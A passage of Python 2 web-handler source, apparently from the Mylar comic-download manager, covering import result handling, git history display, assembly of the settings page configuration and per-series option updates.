myDB.upsert("importresults", newVal, ctrlVal)
if resultset == 0:
if len(search_matches) > 1:
# if we matched on more than one series above, just save those results instead of the entire search result set.
for sres in search_matches:
if type(sres['haveit']) == dict:
imp_cid = sres['haveit']['comicid']
else:
imp_cid = sres['haveit']
cVal = {"SRID": SRID,
"comicid": sres['comicid']}
#should store ogcname in here somewhere to account for naming conversions above.
nVal = {"Series": ComicName,
"results": len(search_matches),
"publisher": sres['publisher'],
"haveit": imp_cid,
"name": sres['name'],
"deck": sres['deck'],
"url": sres['url'],
"description": sres['description'],
"comicimage": sres['comicimage'],
"issues": sres['issues'],
"ogcname": ogcname,
"comicyear": sres['comicyear']}
#logger.fdebug('search_values: [%s]/%s' % (cVal, nVal))
myDB.upsert("searchresults", nVal, cVal)
logger.info('[IMPORT] There is more than one result that might be valid - normally this is due to the filename(s) not having enough information for me to use (ie. no volume label/year). Manual intervention is required.')
#force the status here just in case
newVal = {'SRID': SRID,
'Status': 'Manual Intervention'}
myDB.upsert("importresults", newVal, ctrlVal)
elif len(sresults) > 1:
# store the search results for series that returned more than one result for user to select later / when they want.
# should probably assign some random numeric for an id to reference back at some point.
for sres in sresults:
if type(sres['haveit']) == dict:
imp_cid = sres['haveit']['comicid']
else:
imp_cid = sres['haveit']
cVal = {"SRID": SRID,
"comicid": sres['comicid']}
#should store ogcname in here somewhere to account for naming conversions above.
nVal = {"Series": ComicName,
"results": len(sresults),
"publisher": sres['publisher'],
"haveit": imp_cid,
"name": sres['name'],
"deck": sres['deck'],
"url": sres['url'],
"description": sres['description'],
"comicimage": sres['comicimage'],
"issues": sres['issues'],
"ogcname": ogcname,
"comicyear": sres['comicyear']}
myDB.upsert("searchresults", nVal, cVal)
logger.info('[IMPORT] There is more than one result that might be valid - normally this is due to the filename(s) not having enough information for me to use (ie. no volume label/year). Manual intervention is required.')
#force the status here just in case
newVal = {'SRID': SRID,
'Status': 'Manual Intervention'}
myDB.upsert("importresults", newVal, ctrlVal)
else:
logger.info('[IMPORT] Could not find any matching results against CV. Check the logs and perhaps rename the attempted file(s)')
newVal = {'SRID': SRID,
'Status': 'No Results'}
myDB.upsert("importresults", newVal, ctrlVal)
else:
logger.info('[IMPORT] Now adding %s...' % ComicName)
if volume is None or volume == 'None':
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume IS NULL",[DynamicName])
else:
if not volume.lower().startswith('v'):
volume = 'v' + str(volume)
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume=?",[DynamicName,volume])
files = []
for result in results:
files.append({'comicfilename': result['ComicFilename'],
'comiclocation': result['ComicLocation'],
'issuenumber': result['IssueNumber'],
'import_id': result['impID']})
imported = {'ComicName': ComicName,
'DynamicName': DynamicName,
'Volume': volume,
'filelisting': files,
'srid': SRID}
self.addbyid(sr['comicid'], calledby=True, imported=imported, ogcname=ogcname, nothread=True)
mylar.IMPORTLOCK = False
logger.info('[IMPORT] Import completed.')
preSearchit.exposed = True
def importresults_popup(self, SRID, ComicName, imported=None, ogcname=None, DynamicName=None, Volume=None):
myDB = db.DBConnection()
resultset = myDB.select("SELECT * FROM searchresults WHERE SRID=?", [SRID])
if not resultset:
logger.warn('There are no search results to view for this entry ' + ComicName + ' [' + str(SRID) + ']. Something is probably wrong.')
raise cherrypy.HTTPRedirect("importResults")
searchresults = resultset
if any([Volume is None, Volume == 'None']):
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume IS NULL",[DynamicName])
else:
if not Volume.lower().startswith('v'):
volume = 'v' + str(Volume)
else:
volume = Volume
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume=?",[DynamicName,volume])
files = []
for result in results:
files.append({'comicfilename': result['ComicFilename'],
'comiclocation': result['ComicLocation'],
'issuenumber': result['IssueNumber'],
'import_id': result['impID']})
imported = {'ComicName': ComicName,
'DynamicName': DynamicName,
'Volume': Volume,
'filelisting': files,
'srid': SRID}
return serve_template(templatename="importresults_popup.html", title="results", searchtext=ComicName, searchresults=searchresults, imported=imported)
importresults_popup.exposed = True
def pretty_git(self, br_history):
#in order to 'prettify' the history log for display, we need to break it down so it's line by line.
br_split = br_history.split("\n") #split it on each commit
commit = []
for br in br_split:
commit_st = br.find('-')
commitno = br[:commit_st].strip()
time_end = br.find('-',commit_st+1)
time = br[commit_st+1:time_end].strip()
author_end = br.find('-', time_end+1)
author = br[time_end+1:author_end].strip()
desc = br[author_end+1:].strip()
if len(desc) > 103:
desc = '<span title="%s">%s...</span>' % (desc, desc[:103])
if author != 'evilhero':
pr_tag = True
dspline = '[%s][PR] %s {<span style="font-size:11px">%s/%s</span>}'
else:
pr_tag = False
dspline = '[%s] %s {<span style="font-size:11px">%s/%s</span>}'
commit.append(dspline % ("<a href='https://github.com/evilhero/mylar/commit/" + commitno + "'>"+commitno+"</a>", desc, time, author))
return '<br />\n'.join(commit)
pretty_git.exposed = True
#---
def config(self):
interface_dir = os.path.join(mylar.PROG_DIR, 'data/interfaces/')
interface_list = [name for name in os.listdir(interface_dir) if os.path.isdir(os.path.join(interface_dir, name))]
#----
# to be implemented in the future.
if mylar.INSTALL_TYPE == 'git':
try:
branch_history, err = mylar.versioncheck.runGit('log --encoding=UTF-8 --pretty=format:"%h - %cr - %an - %s" -n 5')
#here we pass the branch_history to the pretty_git module to break it down
if branch_history:
br_hist = self.pretty_git(branch_history)
try:
br_hist = u"" + br_hist.decode('utf-8')
except:
br_hist = br_hist
else:
br_hist = err
except Exception as e:
logger.fdebug('[ERROR] Unable to retrieve git revision history for some reason: %s' % e)
br_hist = 'This would be a nice place to see revision history...'
else:
br_hist = 'This would be a nice place to see revision history...'
#----
myDB = db.DBConnection()
CCOMICS = myDB.select("SELECT COUNT(*) FROM comics")
CHAVES = myDB.select("SELECT COUNT(*) FROM issues WHERE Status='Downloaded' OR Status='Archived'")
CISSUES = myDB.select("SELECT COUNT(*) FROM issues")
CSIZE = myDB.select("select SUM(ComicSize) from issues where Status='Downloaded' or Status='Archived'")
COUNT_COMICS = CCOMICS[0][0]
COUNT_HAVES = CHAVES[0][0]
COUNT_ISSUES = CISSUES[0][0]
COUNT_SIZE = helpers.human_size(CSIZE[0][0])
CCONTCOUNT = 0
cti = helpers.havetotals()
for cchk in cti:
if cchk['recentstatus'] is 'Continuing':
CCONTCOUNT += 1
comicinfo = {"COUNT_COMICS": COUNT_COMICS,
"COUNT_HAVES": COUNT_HAVES,
"COUNT_ISSUES": COUNT_ISSUES,
"COUNT_SIZE": COUNT_SIZE,
"CCONTCOUNT": CCONTCOUNT}
DLPROVSTATS = myDB.select("SELECT Provider, COUNT(Provider) AS Frequency FROM Snatched WHERE Status = 'Snatched' AND Provider is NOT NULL GROUP BY Provider ORDER BY Frequency DESC")
freq = dict()
freq_tot = 0
for row in DLPROVSTATS:
if any(['CBT' in row['Provider'], '32P' in row['Provider'], 'ComicBT' in row['Provider']]):
try:
tmpval = freq['32P']
freq.update({'32P': tmpval + row['Frequency']})
except:
freq.update({'32P': row['Frequency']})
elif 'KAT' in row['Provider']:
try:
tmpval = freq['KAT']
freq.update({'KAT': tmpval + row['Frequency']})
except:
freq.update({'KAT': row['Frequency']})
elif 'experimental' in row['Provider']:
try:
tmpval = freq['Experimental']
freq.update({'Experimental': tmpval + row['Frequency']})
except:
freq.update({'Experimental': row['Frequency']})
elif [True for x in freq if re.sub("\(newznab\)", "", str(row['Provider'])).strip() in x]:
try:
tmpval = freq[re.sub("\(newznab\)", "", row['Provider']).strip()]
freq.update({re.sub("\(newznab\)", "", row['Provider']).strip(): tmpval + row['Frequency']})
except:
freq.update({re.sub("\(newznab\)", "", row['Provider']).strip(): row['Frequency']})
else:
freq.update({re.sub("\(newznab\)", "", row['Provider']).strip(): row['Frequency']})
freq_tot += row['Frequency']
dlprovstats = sorted(freq.iteritems(), key=itemgetter(1), reverse=True)
if mylar.SCHED_RSS_LAST is None:
rss_sclast = 'Unknown'
else:
rss_sclast = datetime.datetime.fromtimestamp(mylar.SCHED_RSS_LAST).replace(microsecond=0)
config = {
"comicvine_api": mylar.CONFIG.COMICVINE_API,
"http_host": mylar.CONFIG.HTTP_HOST,
"http_user": mylar.CONFIG.HTTP_USERNAME,
"http_port": mylar.CONFIG.HTTP_PORT,
"http_pass": mylar.CONFIG.HTTP_PASSWORD,
"enable_https": helpers.checked(mylar.CONFIG.ENABLE_HTTPS),
"https_cert": mylar.CONFIG.HTTPS_CERT,
"https_key": mylar.CONFIG.HTTPS_KEY,
"authentication": int(mylar.CONFIG.AUTHENTICATION),
"api_enabled": helpers.checked(mylar.CONFIG.API_ENABLED),
"api_key": mylar.CONFIG.API_KEY,
"launch_browser": helpers.checked(mylar.CONFIG.LAUNCH_BROWSER),
"auto_update": helpers.checked(mylar.CONFIG.AUTO_UPDATE),
"max_logsize": mylar.CONFIG.MAX_LOGSIZE,
"annuals_on": helpers.checked(mylar.CONFIG.ANNUALS_ON),
"enable_check_folder": helpers.checked(mylar.CONFIG.ENABLE_CHECK_FOLDER),
"check_folder": mylar.CONFIG.CHECK_FOLDER,
"download_scan_interval": mylar.CONFIG.DOWNLOAD_SCAN_INTERVAL,
"search_interval": mylar.CONFIG.SEARCH_INTERVAL,
"nzb_startup_search": helpers.checked(mylar.CONFIG.NZB_STARTUP_SEARCH),
"search_delay": mylar.CONFIG.SEARCH_DELAY,
"nzb_downloader_sabnzbd": helpers.radio(mylar.CONFIG.NZB_DOWNLOADER, 0),
"nzb_downloader_nzbget": helpers.radio(mylar.CONFIG.NZB_DOWNLOADER, 1),
"nzb_downloader_blackhole": helpers.radio(mylar.CONFIG.NZB_DOWNLOADER, 2),
"sab_host": mylar.CONFIG.SAB_HOST,
"sab_user": mylar.CONFIG.SAB_USERNAME,
"sab_api": mylar.CONFIG.SAB_APIKEY,
"sab_pass": mylar.CONFIG.SAB_PASSWORD,
"sab_cat": mylar.CONFIG.SAB_CATEGORY,
"sab_priority": mylar.CONFIG.SAB_PRIORITY,
"sab_directory": mylar.CONFIG.SAB_DIRECTORY,
"sab_to_mylar": helpers.checked(mylar.CONFIG.SAB_TO_MYLAR),
"sab_version": mylar.CONFIG.SAB_VERSION,
"sab_client_post_processing": helpers.checked(mylar.CONFIG.SAB_CLIENT_POST_PROCESSING),
"nzbget_host": mylar.CONFIG.NZBGET_HOST,
"nzbget_port": mylar.CONFIG.NZBGET_PORT,
"nzbget_user": mylar.CONFIG.NZBGET_USERNAME,
"nzbget_pass": mylar.CONFIG.NZBGET_PASSWORD,
"nzbget_cat": mylar.CONFIG.NZBGET_CATEGORY,
"nzbget_priority": mylar.CONFIG.NZBGET_PRIORITY,
"nzbget_directory": mylar.CONFIG.NZBGET_DIRECTORY,
"nzbget_client_post_processing": helpers.checked(mylar.CONFIG.NZBGET_CLIENT_POST_PROCESSING),
"torrent_downloader_watchlist": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 0),
"torrent_downloader_utorrent": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 1),
"torrent_downloader_rtorrent": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 2),
"torrent_downloader_transmission": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 3),
"torrent_downloader_deluge": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 4),
"torrent_downloader_qbittorrent": helpers.radio(int(mylar.CONFIG.TORRENT_DOWNLOADER), 5),
"utorrent_host": mylar.CONFIG.UTORRENT_HOST,
"utorrent_username": mylar.CONFIG.UTORRENT_USERNAME,
"utorrent_password": mylar.CONFIG.UTORRENT_PASSWORD,
"utorrent_label": mylar.CONFIG.UTORRENT_LABEL,
"rtorrent_host": mylar.CONFIG.RTORRENT_HOST,
"rtorrent_rpc_url": mylar.CONFIG.RTORRENT_RPC_URL,
"rtorrent_authentication": mylar.CONFIG.RTORRENT_AUTHENTICATION,
"rtorrent_ssl": helpers.checked(mylar.CONFIG.RTORRENT_SSL),
"rtorrent_verify": helpers.checked(mylar.CONFIG.RTORRENT_VERIFY),
"rtorrent_username": mylar.CONFIG.RTORRENT_USERNAME,
"rtorrent_password": mylar.CONFIG.RTORRENT_PASSWORD,
"rtorrent_directory": mylar.CONFIG.RTORRENT_DIRECTORY,
"rtorrent_label": mylar.CONFIG.RTORRENT_LABEL,
"rtorrent_startonload": helpers.checked(mylar.CONFIG.RTORRENT_STARTONLOAD),
"transmission_host": mylar.CONFIG.TRANSMISSION_HOST,
"transmission_username": mylar.CONFIG.TRANSMISSION_USERNAME,
"transmission_password": mylar.CONFIG.TRANSMISSION_PASSWORD,
"transmission_directory": mylar.CONFIG.TRANSMISSION_DIRECTORY,
"deluge_host": mylar.CONFIG.DELUGE_HOST,
"deluge_username": mylar.CONFIG.DELUGE_USERNAME,
"deluge_password": mylar.CONFIG.DELUGE_PASSWORD,
"deluge_label": mylar.CONFIG.DELUGE_LABEL,
"deluge_pause": helpers.checked(mylar.CONFIG.DELUGE_PAUSE),
"deluge_download_directory": mylar.CONFIG.DELUGE_DOWNLOAD_DIRECTORY,
"deluge_done_directory": mylar.CONFIG.DELUGE_DONE_DIRECTORY,
"qbittorrent_host": mylar.CONFIG.QBITTORRENT_HOST,
"qbittorrent_username": mylar.CONFIG.QBITTORRENT_USERNAME,
"qbittorrent_password": mylar.CONFIG.QBITTORRENT_PASSWORD,
"qbittorrent_label": mylar.CONFIG.QBITTORRENT_LABEL,
"qbittorrent_folder": mylar.CONFIG.QBITTORRENT_FOLDER,
"qbittorrent_loadaction": mylar.CONFIG.QBITTORRENT_LOADACTION,
"blackhole_dir": mylar.CONFIG.BLACKHOLE_DIR,
"usenet_retention": mylar.CONFIG.USENET_RETENTION,
"nzbsu": helpers.checked(mylar.CONFIG.NZBSU),
"nzbsu_uid": mylar.CONFIG.NZBSU_UID,
"nzbsu_api": mylar.CONFIG.NZBSU_APIKEY,
"nzbsu_verify": helpers.checked(mylar.CONFIG.NZBSU_VERIFY),
"dognzb": helpers.checked(mylar.CONFIG.DOGNZB),
"dognzb_api": mylar.CONFIG.DOGNZB_APIKEY,
"dognzb_verify": helpers.checked(mylar.CONFIG.DOGNZB_VERIFY),
"experimental": helpers.checked(mylar.CONFIG.EXPERIMENTAL),
"enable_torznab": helpers.checked(mylar.CONFIG.ENABLE_TORZNAB),
"extra_torznabs": sorted(mylar.CONFIG.EXTRA_TORZNABS, key=itemgetter(5), reverse=True),
"newznab": helpers.checked(mylar.CONFIG.NEWZNAB),
"extra_newznabs": sorted(mylar.CONFIG.EXTRA_NEWZNABS, key=itemgetter(5), reverse=True),
"enable_ddl": helpers.checked(mylar.CONFIG.ENABLE_DDL),
"enable_rss": helpers.checked(mylar.CONFIG.ENABLE_RSS),
"rss_checkinterval": mylar.CONFIG.RSS_CHECKINTERVAL,
"rss_last": rss_sclast,
"provider_order": mylar.CONFIG.PROVIDER_ORDER,
"enable_torrents": helpers.checked(mylar.CONFIG.ENABLE_TORRENTS),
"minseeds": mylar.CONFIG.MINSEEDS,
"torrent_local": helpers.checked(mylar.CONFIG.TORRENT_LOCAL),
"local_watchdir": mylar.CONFIG.LOCAL_WATCHDIR,
"torrent_seedbox": helpers.checked(mylar.CONFIG.TORRENT_SEEDBOX),
"seedbox_watchdir": mylar.CONFIG.SEEDBOX_WATCHDIR,
"seedbox_host": mylar.CONFIG.SEEDBOX_HOST,
"seedbox_port": mylar.CONFIG.SEEDBOX_PORT,
"seedbox_user": mylar.CONFIG.SEEDBOX_USER,
"seedbox_pass": mylar.CONFIG.SEEDBOX_PASS,
"enable_torrent_search": helpers.checked(mylar.CONFIG.ENABLE_TORRENT_SEARCH),
"enable_public": helpers.checked(mylar.CONFIG.ENABLE_PUBLIC),
"enable_32p": helpers.checked(mylar.CONFIG.ENABLE_32P),
"legacymode_32p": helpers.radio(mylar.CONFIG.MODE_32P, 0),
"authmode_32p": helpers.radio(mylar.CONFIG.MODE_32P, 1),
"rssfeed_32p": mylar.CONFIG.RSSFEED_32P,
"passkey_32p": mylar.CONFIG.PASSKEY_32P,
"username_32p": mylar.CONFIG.USERNAME_32P,
"password_32p": mylar.CONFIG.PASSWORD_32P,
"snatchedtorrent_notify": helpers.checked(mylar.CONFIG.SNATCHEDTORRENT_NOTIFY),
"destination_dir": mylar.CONFIG.DESTINATION_DIR,
"create_folders": helpers.checked(mylar.CONFIG.CREATE_FOLDERS),
"enforce_perms": helpers.checked(mylar.CONFIG.ENFORCE_PERMS),
"chmod_dir": mylar.CONFIG.CHMOD_DIR,
"chmod_file": mylar.CONFIG.CHMOD_FILE,
"chowner": mylar.CONFIG.CHOWNER,
"chgroup": mylar.CONFIG.CHGROUP,
"replace_spaces": helpers.checked(mylar.CONFIG.REPLACE_SPACES),
"replace_char": mylar.CONFIG.REPLACE_CHAR,
"use_minsize": helpers.checked(mylar.CONFIG.USE_MINSIZE),
"minsize": mylar.CONFIG.MINSIZE,
"use_maxsize": helpers.checked(mylar.CONFIG.USE_MAXSIZE),
"maxsize": mylar.CONFIG.MAXSIZE,
"interface_list": interface_list,
"dupeconstraint": mylar.CONFIG.DUPECONSTRAINT,
"ddump": helpers.checked(mylar.CONFIG.DDUMP),
"duplicate_dump": mylar.CONFIG.DUPLICATE_DUMP,
"autowant_all": helpers.checked(mylar.CONFIG.AUTOWANT_ALL),
"autowant_upcoming": helpers.checked(mylar.CONFIG.AUTOWANT_UPCOMING),
"comic_cover_local": helpers.checked(mylar.CONFIG.COMIC_COVER_LOCAL),
"alternate_latest_series_covers": helpers.checked(mylar.CONFIG.ALTERNATE_LATEST_SERIES_COVERS),
"pref_qual_0": helpers.radio(int(mylar.CONFIG.PREFERRED_QUALITY), 0),
"pref_qual_1": helpers.radio(int(mylar.CONFIG.PREFERRED_QUALITY), 1),
"pref_qual_2": helpers.radio(int(mylar.CONFIG.PREFERRED_QUALITY), 2),
"move_files": helpers.checked(mylar.CONFIG.MOVE_FILES),
"rename_files": helpers.checked(mylar.CONFIG.RENAME_FILES),
"folder_format": mylar.CONFIG.FOLDER_FORMAT,
"file_format": mylar.CONFIG.FILE_FORMAT,
"zero_level": helpers.checked(mylar.CONFIG.ZERO_LEVEL),
"zero_level_n": mylar.CONFIG.ZERO_LEVEL_N,
"add_to_csv": helpers.checked(mylar.CONFIG.ADD_TO_CSV),
"cvinfo": helpers.checked(mylar.CONFIG.CVINFO),
"lowercase_filenames": helpers.checked(mylar.CONFIG.LOWERCASE_FILENAMES),
"syno_fix": helpers.checked(mylar.CONFIG.SYNO_FIX),
"prowl_enabled": helpers.checked(mylar.CONFIG.PROWL_ENABLED),
"prowl_onsnatch": helpers.checked(mylar.CONFIG.PROWL_ONSNATCH),
"prowl_keys": mylar.CONFIG.PROWL_KEYS,
"prowl_priority": mylar.CONFIG.PROWL_PRIORITY,
"pushover_enabled": helpers.checked(mylar.CONFIG.PUSHOVER_ENABLED),
"pushover_onsnatch": helpers.checked(mylar.CONFIG.PUSHOVER_ONSNATCH),
"pushover_apikey": mylar.CONFIG.PUSHOVER_APIKEY,
"pushover_userkey": mylar.CONFIG.PUSHOVER_USERKEY,
"pushover_device": mylar.CONFIG.PUSHOVER_DEVICE,
"pushover_priority": mylar.CONFIG.PUSHOVER_PRIORITY,
"boxcar_enabled": helpers.checked(mylar.CONFIG.BOXCAR_ENABLED),
"boxcar_onsnatch": helpers.checked(mylar.CONFIG.BOXCAR_ONSNATCH),
"boxcar_token": mylar.CONFIG.BOXCAR_TOKEN,
"pushbullet_enabled": helpers.checked(mylar.CONFIG.PUSHBULLET_ENABLED),
"pushbullet_onsnatch": helpers.checked(mylar.CONFIG.PUSHBULLET_ONSNATCH),
"pushbullet_apikey": mylar.CONFIG.PUSHBULLET_APIKEY,
"pushbullet_deviceid": mylar.CONFIG.PUSHBULLET_DEVICEID,
"pushbullet_channel_tag": mylar.CONFIG.PUSHBULLET_CHANNEL_TAG,
"telegram_enabled": helpers.checked(mylar.CONFIG.TELEGRAM_ENABLED),
"telegram_onsnatch": helpers.checked(mylar.CONFIG.TELEGRAM_ONSNATCH),
"telegram_token": mylar.CONFIG.TELEGRAM_TOKEN,
"telegram_userid": mylar.CONFIG.TELEGRAM_USERID,
"slack_enabled": helpers.checked(mylar.CONFIG.SLACK_ENABLED),
"slack_webhook_url": mylar.CONFIG.SLACK_WEBHOOK_URL,
"slack_onsnatch": helpers.checked(mylar.CONFIG.SLACK_ONSNATCH),
"email_enabled": helpers.checked(mylar.CONFIG.EMAIL_ENABLED),
"email_from": mylar.CONFIG.EMAIL_FROM,
"email_to": mylar.CONFIG.EMAIL_TO,
"email_server": mylar.CONFIG.EMAIL_SERVER,
"email_user": mylar.CONFIG.EMAIL_USER,
"email_password": mylar.CONFIG.EMAIL_PASSWORD,
"email_port": int(mylar.CONFIG.EMAIL_PORT),
"email_raw": helpers.radio(int(mylar.CONFIG.EMAIL_ENC), 0),
"email_ssl": helpers.radio(int(mylar.CONFIG.EMAIL_ENC), 1),
"email_tls": helpers.radio(int(mylar.CONFIG.EMAIL_ENC), 2),
"email_ongrab": helpers.checked(mylar.CONFIG.EMAIL_ONGRAB),
"email_onpost": helpers.checked(mylar.CONFIG.EMAIL_ONPOST),
"enable_extra_scripts": helpers.checked(mylar.CONFIG.ENABLE_EXTRA_SCRIPTS),
"extra_scripts": mylar.CONFIG.EXTRA_SCRIPTS,
"enable_snatch_script": helpers.checked(mylar.CONFIG.ENABLE_SNATCH_SCRIPT),
"snatch_script": mylar.CONFIG.SNATCH_SCRIPT,
"enable_pre_scripts": helpers.checked(mylar.CONFIG.ENABLE_PRE_SCRIPTS),
"pre_scripts": mylar.CONFIG.PRE_SCRIPTS,
"post_processing": helpers.checked(mylar.CONFIG.POST_PROCESSING),
"file_opts": mylar.CONFIG.FILE_OPTS,
"enable_meta": helpers.checked(mylar.CONFIG.ENABLE_META),
"cbr2cbz_only": helpers.checked(mylar.CONFIG.CBR2CBZ_ONLY),
"cmtagger_path": mylar.CONFIG.CMTAGGER_PATH,
"ct_tag_cr": helpers.checked(mylar.CONFIG.CT_TAG_CR),
"ct_tag_cbl": helpers.checked(mylar.CONFIG.CT_TAG_CBL),
"ct_cbz_overwrite": helpers.checked(mylar.CONFIG.CT_CBZ_OVERWRITE),
"unrar_cmd": mylar.CONFIG.UNRAR_CMD,
"failed_download_handling": helpers.checked(mylar.CONFIG.FAILED_DOWNLOAD_HANDLING),
"failed_auto": helpers.checked(mylar.CONFIG.FAILED_AUTO),
"branch": mylar.CONFIG.GIT_BRANCH,
"br_type": mylar.INSTALL_TYPE,
"br_version": mylar.versioncheck.getVersion()[0],
"py_version": platform.python_version(),
"data_dir": mylar.DATA_DIR,
"prog_dir": mylar.PROG_DIR,
"cache_dir": mylar.CONFIG.CACHE_DIR,
"config_file": mylar.CONFIG_FILE,
"lang": '%s.%s' % (logger.LOG_LANG,logger.LOG_CHARSET),
"branch_history" : br_hist,
"log_dir": mylar.CONFIG.LOG_DIR,
"opds_enable": helpers.checked(mylar.CONFIG.OPDS_ENABLE),
"opds_authentication": helpers.checked(mylar.CONFIG.OPDS_AUTHENTICATION),
"opds_username": mylar.CONFIG.OPDS_USERNAME,
"opds_password": mylar.CONFIG.OPDS_PASSWORD,
"opds_metainfo": helpers.checked(mylar.CONFIG.OPDS_METAINFO),
"opds_pagesize": mylar.CONFIG.OPDS_PAGESIZE,
"dlstats": dlprovstats,
"dltotals": freq_tot,
"alphaindex": mylar.CONFIG.ALPHAINDEX
}
return serve_template(templatename="config.html", title="Settings", config=config, comicinfo=comicinfo)
config.exposed = True
def error_change(self, comicid, errorgcd, comicname, comicyear, imported=None, mogcname=None):
# if comicname contains a "," it will break the exceptions import.
import urllib
b = urllib.unquote_plus(comicname)
# cname = b.decode("utf-8")
cname = b.encode('utf-8')
cname = re.sub("\,", "", cname)
if mogcname != None:
c = urllib.unquote_plus(mogcname)
ogcname = c.encode('utf-8')
else:
ogcname = None
if errorgcd[:5].isdigit():
logger.info("GCD-ID detected : " + str(errorgcd)[:5])
logger.info("ogcname: " + str(ogcname))
logger.info("I'm assuming you know what you're doing - going to force-match for " + cname)
self.from_Exceptions(comicid=comicid, gcdid=errorgcd, comicname=cname, comicyear=comicyear, imported=imported, ogcname=ogcname)
else:
logger.info("Assuming rewording of Comic - adjusting to : " + str(errorgcd))
Err_Info = mylar.cv.getComic(comicid, 'comic')
self.addComic(comicid=comicid, comicname=str(errorgcd), comicyear=Err_Info['ComicYear'], comicissues=Err_Info['ComicIssues'], comicpublisher=Err_Info['ComicPublisher'])
error_change.exposed = True
def manual_annual_add(self, manual_comicid, comicname, comicyear, comicid, x=None, y=None):
import urllib
b = urllib.unquote_plus(comicname)
cname = b.encode('utf-8')
logger.fdebug('comicid to be attached : ' + str(manual_comicid))
logger.fdebug('comicname : ' + str(cname))
logger.fdebug('comicyear : ' + str(comicyear))
logger.fdebug('comicid : ' + str(comicid))
issueid = manual_comicid
logger.fdebug('I will be adding ' + str(issueid) + ' to the Annual list for this series.')
threading.Thread(target=importer.manualAnnual, args=[manual_comicid, cname, comicyear, comicid]).start()
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
manual_annual_add.exposed = True
def comic_config(self, com_location, ComicID, alt_search=None, fuzzy_year=None, comic_version=None, force_continuing=None, force_type=None, alt_filename=None, allow_packs=None, corrected_seriesyear=None, torrentid_32p=None):
myDB = db.DBConnection()
chk1 = myDB.selectone('SELECT ComicLocation, Corrected_Type FROM comics WHERE ComicID=?', [ComicID]).fetchone()
if chk1[0] is None:
orig_location = com_location
else:
orig_location = chk1[0]
if chk1[1] is None:
orig_type = None
else:
orig_type = chk1[1]
#--- this is for multiple search terms............
#--- works, just need to redo search.py to accomodate multiple search terms
ffs_alt = []
if '##' in alt_search:
ffs = alt_search.find('##')
ffs_alt.append(alt_search[:ffs])
ffs_alt_st = str(ffs_alt[0])
ffs_test = alt_search.split('##')
if len(ffs_test) > 0:
ffs_count = len(ffs_test)
n=1
while (n < ffs_count):
ffs_alt.append(ffs_test[n])
ffs_alt_st = str(ffs_alt_st) + "..." + str(ffs_test[n])
n+=1
asearch = ffs_alt
else:
asearch = alt_search
asearch = str(alt_search)
controlValueDict = {'ComicID': ComicID}
newValues = {}
if asearch is not None:
if re.sub(r'\s', '', asearch) == '':
newValues['AlternateSearch'] = "None"
else:
newValues['AlternateSearch'] = str(asearch)
else:
newValues['AlternateSearch'] = "None"
if fuzzy_year is None:
newValues['UseFuzzy'] = "0"
else:
newValues['UseFuzzy'] = str(fuzzy_year)
if corrected_seriesyear is not None:
newValues['Corrected_SeriesYear'] = str(corrected_seriesyear)
newValues['ComicYear'] = str(corrected_seriesyear)
if comic_version is None or comic_version == 'None':
newValues['ComicVersion'] = "None"
else:
if comic_version[1:].isdigit() and comic_version[:1].lower() == 'v':
newValues['ComicVersion'] = str(comic_version)
else:
logger.info("Invalid Versioning entered - it must be in the format of v#")
newValues['ComicVersion'] = "None"
if force_continuing is None:
newValues['ForceContinuing'] = 0
else:
newValues['ForceContinuing'] = 1
if force_type == '1':
newValues['Corrected_Type'] = 'TPB'
elif force_type == '2':
newValues['Corrected_Type'] = 'Print'
else:
newValues['Corrected_Type'] = None
if orig_type != force_type:
if '$Type' in mylar.CONFIG.FOLDER_FORMAT and com_location == orig_location:
#rename folder to accomodate new forced TPB format.
import filers
x = filers.FileHandlers(ComicID=ComicID)
newcom_location = x.folder_create(booktype=newValues['Corrected_Type'])
if newcom_location is not None:
com_location = newcom_location
if allow_packs is None:
newValues['AllowPacks'] = 0
else:
newValues['AllowPacks'] = 1
newValues['TorrentID_32P'] = torrentid_32p
if alt_filename is None or alt_filename == 'None':
newValues['AlternateFileName'] = "None"
else:
newValues['AlternateFileName'] = str(alt_filename)
#force the check/creation of directory com_location here
updatedir = True
if any([mylar.CONFIG.CREATE_FOLDERS is True, os.path.isdir(orig_location)]):
if os.path.isdir(str(com_location)):
logger.info(u"Validating Directory (" + str(com_location) + "). Already exists! Continuing...")
else:
if orig_location != com_location and os.path.isdir(orig_location) is True:
logger.fdebug('Renaming existing location [%s] to new location: %s' % (orig_location, com_location))
try:
os.rename(orig_location, com_location)
except Exception as e:
if 'No such file or directory' in e:
checkdirectory = filechecker.validateAndCreateDirectory(com_location, True)
if not checkdirectory:
logger.warn('Error trying to validate/create directory. Aborting this process at this time.')
updatedir = False
else:
logger.warn('Unable to rename existing directory: %s' % e)
updatedir = False
else:
if orig_location != com_location and os.path.isdir(orig_location) is False:
logger.fdebug("Original Directory (%s) doesn't exist! - attempting to create new directory (%s)" % (orig_location, com_location))
else:
logger.fdebug("Updated Directory doesn't exist! - attempting to create now.")
checkdirectory = filechecker.validateAndCreateDirectory(com_location, True)
if not checkdirectory:
logger.warn('Error trying to validate/create directory. Aborting this process at this time.')
updatedir = False
else:
logger.info('[Create directories False] Not creating physical directory, but updating series location in dB to: %s' % com_location)
if updatedir is True:
newValues['ComicLocation'] = com_location
myDB.upsert("comics", newValues, controlValueDict)
logger.fdebug('Updated Series options!')
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % ComicID)
comic_config.exposed = True
def readlistOptions(self, send2read=0, tab_enable=0, tab_host=None, tab_user=None, tab_pass=None, tab_directory=None, maintainseriesfolder=0):
mylar.CONFIG.SEND2READ = bool(int(send2read))
mylar.CONFIG.MAINTAINSERIESFOLDER = bool(int(maintainseriesfolder))
mylar.CONFIG.TAB_ENABLE = bool(int(tab_enable))
mylar.CONFIG.TAB_HOST = tab_host
